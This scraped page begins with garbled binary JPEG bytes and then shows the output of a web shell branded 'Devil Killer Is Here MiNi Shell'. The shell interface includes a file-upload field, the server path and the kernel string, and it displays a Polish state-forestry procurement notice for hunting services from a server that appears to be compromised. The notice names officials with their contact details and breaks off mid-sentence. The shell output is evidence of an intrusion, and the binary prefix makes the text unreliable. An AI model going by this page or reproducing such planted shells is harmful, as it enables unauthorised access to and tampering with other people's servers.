JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220210/0005330001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie usług z zakresu gospodarki łowieckiej na terenie OHZ Nadleśnictwa Krotoszyn w 2022 roku – IV Postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa – Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Krotoszyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250027755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wiewiórowskiego 70</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krotoszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627253268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">627253435</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krotoszyn@poznan.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.krotoszyn.poznan.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie usług z zakresu gospodarki łowieckiej na terenie OHZ Nadleśnictwa Krotoszyn w 2022 roku – IV Postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a93629f1-8a62-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00053300</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Sposób<br/>komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>a) komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie za<br/>pośrednictwem ePUAP. We wszelkiej korespondencji Zamawiający i Wykonawcy posługują się<br/>numerem postępowania wskazanym w SWZ.<br/>b) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email krotoszyn@poznan.lasy.gov.pl , justyna.brylewska@poznan.lasy.gov.pl.<br/>c) Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci<br/>papierowej (elektroniczne kopie dokumentów stworzonych w postaci papierowej) składane są przez<br/>Wykonawcę za pośrednictwem poczty elektronicznej, na wskazany w lit b) adres email..<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi rozporządzeniu Prezesa Rady Ministrów<br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. poz. 2415)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Krotoszyn ul. Wiewiórowskiego<br/>70, 63 – 700 Krotoszyn<br/>tel. +48 62 725 32 68, fax +48 62 725 34 35 , e-mail: krotoszyn@poznan.lasy.gov.pl . Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych p. Agnieszkę Sikorę, z którym w sprawach<br/>dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty<br/>elektronicznej pod adresem agnieszka.sikora@rodo.pl lub telefonicznie pod numerem + 48 605 236<br/>634.<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>2. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich<br/>wniesienia.<br/>3. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są<br/>obowiązane do zachowania ich w poufności.<br/>4. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu<br/>zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia i jego archiwizacji.<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o przepisy PZP, a także ustawy o dostępie do informacji publicznej.<br/>6. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.<br/>7. Niezależnie od postanowień pkt 7 powyżej, w przypadku zawarcia umowy w sprawie zamówienia<br/>publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń<br/>wynikających z umowy w sprawie zamówienia publicznego.<br/>8. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i<br/>konsultingowe,<br/>9. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą<br/>podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10. Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego<br/>postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w<br/>sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby<br/>niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź<br/>zakończonego postępowania o udzielenie zamówienia publicznego;2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.<br/>13. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>14. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21<br/>RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą<br/>prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>15. Dane osobowe mogą być przekazywane do organów publicznych i urzędów<br/>państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa<br/>lub wykonujących zadania realizowane w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej, w szczególności do podmiotów prowadzących<br/>działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do<br/>podmiotów przetwarzających dane w imieniu administratora danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi z zakresu gospodarki leśnej zgodnie z określeniem w art.<br/>6 ust. 1 pkt. 1 ustawy z dnia 28 września 1991 r. o lasach (tekst jedn.: Dz.U.2021.0.1275 z późn.zm. – „Ustawa o lasach”) obejmujące prace z zakresu gospodarki łowieckiej na terenie dwóch<br/>obwodów łowieckich Ośrodka Hodowli Zwierzyny nadleśnictwa (dalej zwanego również jako<br/>OHZ), do wykonania na terenie Nadleśnictwa Krotoszyn w roku 2022.<br/>W szczególności przedmiot zamówienia obejmuje: organizację polowań, zagospodarowanie<br/>obwodów łowieckich, budowę urządzeń łowieckich, dokarmianie zwierzyny, ochronę pól<br/>uprawnych i łąk przed szkodami od zwierzyny. Opis czynności zawiera załącznik nr 9 do SWZ.<br/>Organizacja polowań.<br/>W trakcie polowań prowadzący polowanie działając z ramienia Zamawiającego jest<br/>upoważniony do bezpośredniego wydawania obsłudze polowania poleceń związanych z<br/>wykonywaniem niezbędnych zadań związanych z prawidłową obsługą polowania.<br/>Przed rozpoczęciem polowania do obowiązków Wykonawcy należy w szczególności:<br/>• wyposażenie naganiaczy i innych osób obsługujących polowanie z ramienia Wykonawcy w<br/>kamizelki ostrzegawcze (w kolorze ustalonym z prowadzącym polowanie) oraz odpowiednią<br/>odzież i obuwie ochronne w zależności od panujących warunków atmosferycznych, a także<br/>dbałość o ich używanie przez obsługę polowania podczas całego polowania aż do ogłoszenia<br/>jego zakończenia;<br/>• zabezpieczenie właściwego wyposażenia apteczki;<br/>• zabezpieczenie innych materiałów niezbędnych do prawidłowej obsługi polowania (haki do<br/>transportu tusz ubitej zwierzyny, linki do ściągania zwierzyny itp.);<br/>• punktualne (zgodnie z zaleceniem Przedstawiciela Zamawiającego prowadzącego dane<br/>polowanie zbiorowe) zgromadzenie podległych osób (naganiaczy i pomocników) i właściwie<br/>ustawienie ich do odprawy, a także odpowiednie rozlokowanie środków transportu; miejscem<br/>zbiórki jest Dom Łowiecki w Baszkowie (Baszków 116, 63-760 Zduny); w przypadku ewentualnej<br/>zmiany miejsca zbiórki Zamawiający jednoznacznie wskaże w Wykonawcy nowe miejsce<br/>zbiórki.<br/>Obsługa polowania pędzonego obejmuje:<br/>• zapewnienie każdego dnia polowania odpowiedniej liczby naganiaczy do wypłaszania<br/>zwierzyny w ilości co najmniej 12 osób w tym minimum dwóch osób przygotowanych do<br/>patroszenia zwierzyny;<br/>Do obowiązków nagonki należy w szczególności: patroszenie upolowanej zwierzyny zgodnie<br/>zachowaniem zasad stosowania bioasekuracji w związku z zapobieganiem rozprzestrzeniania<br/>się wirusa ASF; ściąganie do miejsc załadunku, donoszenie oraz załadunek ubitej zwierzyny na<br/>środek transportu, rozładunek na pokocie oraz w punkcie skupu wraz z pomocą przy ważeniu;<br/>przygotowanie ogniska w trakcie przerwy śniadaniowej podczas trwania polowania;<br/>informowanie prowadzącego polowanie zbiorowe o wszelkich przypadkach odnalezienia<br/>podczas poszczególnych pędzeń padłej lub rannej zwierzyny;<br/>• zapewnienie w każdym dniu polowania odpowiedniej liczby psów do wypłaszania zwierzyny w<br/>ilości co najmniej 8 szt. Zamawiający wymaga aby to były wcześniej sprawdzone w łowisku psy<br/>ras myśliwskich lub ich mieszańce o cechach użytkowych spełniających wymogi dla psów<br/>używanych podczas polowań zbiorowych na zwierzynę grubą. O ilości psów w danym dniu<br/>polowania decyduje zlecający; Wykonawca jest zobowiązany do posiadania minimum jednego<br/>dodatkowego psa, który będzie psem zapasowym do wykorzystania w sytuacji zranienia lub<br/>zagubienia się innego psa biorącego udział w polowaniu;<br/>Wskazane jest zaopatrzenie psów w jaskrawe elementy ułatwiające ich rozpoznanie w czasie<br/>polowania.<br/>• zapewnienie w każdym dniu polowania środka transportu do przewożenia upolowanej<br/>zwierzyny wyposażonego w karawan umożliwiający podwieszania upolowanej zwierzyny.<br/>Środek transportu musi posiadać aktualny przegląd techniczny, ubezpieczenie OC i NW.<br/>Używany karawan powinien być zaopatrzony w pojemnik na narogi, pojemnik na wodę do mycia<br/>rąk oraz dostosowany do zasad bioasekuracji w związku z zapobieganiem rozprzestrzeniania<br/>się wirusa ASF<br/>• zapewnienie w trakcie polowania środków transportu dla myśliwych i naganiaczy.• przygotowanie miejsca pokotu (dostarczenie i ułożenie gałęzi świerkowych, rozpalenie ogniska<br/>oraz pochodni, ułożenie pokotu wg wskazań prowadzącego polowanie, zabezpieczenie ubitej<br/>zwierzyny przed uszkodzeniami powodowanymi przez psy.<br/>Nie później niż 2 dni przed terminem polowania wykonawca otrzyma pisemne zlecenie, w którym<br/>będą określone ilości i zakresy prac. Za zgodą stron termin przesłania zlecenia może ulec<br/>skróceniu.<br/>Zagospodarowanie obwodów łowieckich<br/>W ramach zagospodarowania obwodów łowieckich Wykonawca zapewni: uprawę poletek<br/>łowieckich poprzez ręczny siew i zbiór płodów, mechaniczną orkę, bronowanie,<br/>kultywatorowanie, wysiew nasion i nawozów przy użyciu siewnika. Material siewny zapewni<br/>Zamawiajacy, mechaniczne wyoranie ścieżek podchodowych,<br/>Budowa i naprawa urządzeń łowieckich<br/>W ramach tych zadań Wykonawca zapewni:<br/>• budowę urządzeń łowieckich. Materiał do budowy ambon, zwyżek i lizawek zapewni<br/>Zamawiający.<br/>• transport materiału przeznaczonego do budowy urządzeń łowieckich oraz transport tych<br/>urządzeń do określonego przez leśniczego miejsca w łowisku wykonany ciągnikiem,<br/>• naprawę tych urządzeń z materiału nadleśnictwa zgodnie z zaleceniami leśniczego,<br/>• rozbiórkę urządzeń łowieckich przeznaczonych do likwidacji.<br/>Dokarmianie zwierzyny<br/>W ramach tych zadań Wykonawca zapewni:<br/>• dokarmianie zwierzyny polegające na wykładaniu karmy np. kukurydzy, buraków, kiszonki czy<br/>lizawek solnych w określonych przez leśniczego miejscach - materiał nadleśnictwa<br/>• transport karmy np. kukurydzy, buraków, kiszonki czy lizawek solnych do określonych przez<br/>leśniczego miejsc wykonany ciągnikiem- materiał nadleśnictwa<br/>• przygotowanie łowiska do polowań polegające na wykonaniu wizur, usuwaniu<br/>przeszkadzających gałęzi i krzewów, itp.<br/>Ochrona pól uprawnych i łąk przed szkodami od zwierzyny.<br/>• zabezpieczenie pól przed szkodami polegać będzie na wykonaniu grodzeń i pastuchów oraz<br/>na wykładaniu środków odstraszających ( materiał nadleśnictwa).<br/>• wysiew i przyoranie ziarna kukurydzy na pasach zaporowych. Materiał siewny zapewni<br/>Zamawiający.<br/>• Wykonawca zapewni pilnowanie pól w celu ograniczenia szkód wyrządzanych przez<br/>zwierzynę.<br/>Szczegółowy określenie ilości godzin do wykonania zawiera załącznik nr 8 do SWZ. Określenie<br/>ilości godzin ma charakter szacunkowy. Faktyczna ilość godzin może być mniejsza lub większa,<br/>co nie może być podstawą jakichkolwiek roszczeń do Zamawiającego.<br/>2. Wykonawca zobowiązany będzie do wykonywania przedmiotu zamówienia zgodnie z<br/>zasadami etyki i zwyczajów łowieckich oraz z obowiązującymi przepisami prawa, a w<br/>szczególności zgodnie z: 1) ustawą z dnia 28 września 1991 r. o lasach (tekst jedn.:<br/>Dz.U.2021.0.1275 z późn. zm.), 2) ustawą z dnia 11 września 2019r. Prawo zamówień<br/>publicznych (tekst jedn. Dz. U. z 2021 r. poz. 1129 z późn. zm.), 3) ustawą z dnia 13<br/>października1995 r. Prawo łowieckie (tekst jedn. Dz.U.2020.1683 z późn. zm), 4) Instrukcją<br/>bezpieczeństwa i higieny pracy przy wykonywaniu podstawowych prac z zakresu gospodarki<br/>leśnej” - wprowadzona zarządzeniem Nr 36 Dyrektora Generalnego Lasów Państwowych z dnia<br/>20 kwietnia 2012 r., 5) Instrukcją ochrony przeciwpożarowej lasu” - wprowadzona zarządzeniem<br/>Nr 81 Dyrektora Generalnego Lasów Państwowych z dnia 23 grudnia 2019 r., 6) wytycznymi<br/>specyfikacji warunków zamówienia 7) wskazaniami Zamawiającego ustalanymi w trakcie<br/>wykonywania zamówienia.<br/>3. Wykonawca zobowiązany jest do stosowania zasad bioasekuracji przy patroszeniu tusz,<br/>utylizacji patrochów oraz transporcie tusz, opisanych z załączniku nr 10 do SIWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77200000-2 - Usługi leśnictwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 7. Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do<br/>łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu ofertowego<br/>stanowiącego część Oferty („Opcja”). Przedmiotem Opcji będą takie same (analogiczne prace),<br/>jak opisane w SWZ i wycenione przez Wykonawcę w którejkolwiek z pozycji kosztorysu<br/>ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru Zamawiającego, mogą<br/>zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych<br/>przez Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty.<br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała<br/>20 % Wartości Przedmiotu Umowy określonej zgodnie z § 3 ust. 1 wzoru umowy stanowiącego<br/>załącznik nr 4 do SWZ (wzór umowy). Podstawą określenia wartości prac zleconych w ramach<br/>Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w<br/>kosztorysie ofertowym stanowiącym część Oferty.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy<br/>nie służy roszczenie o ich 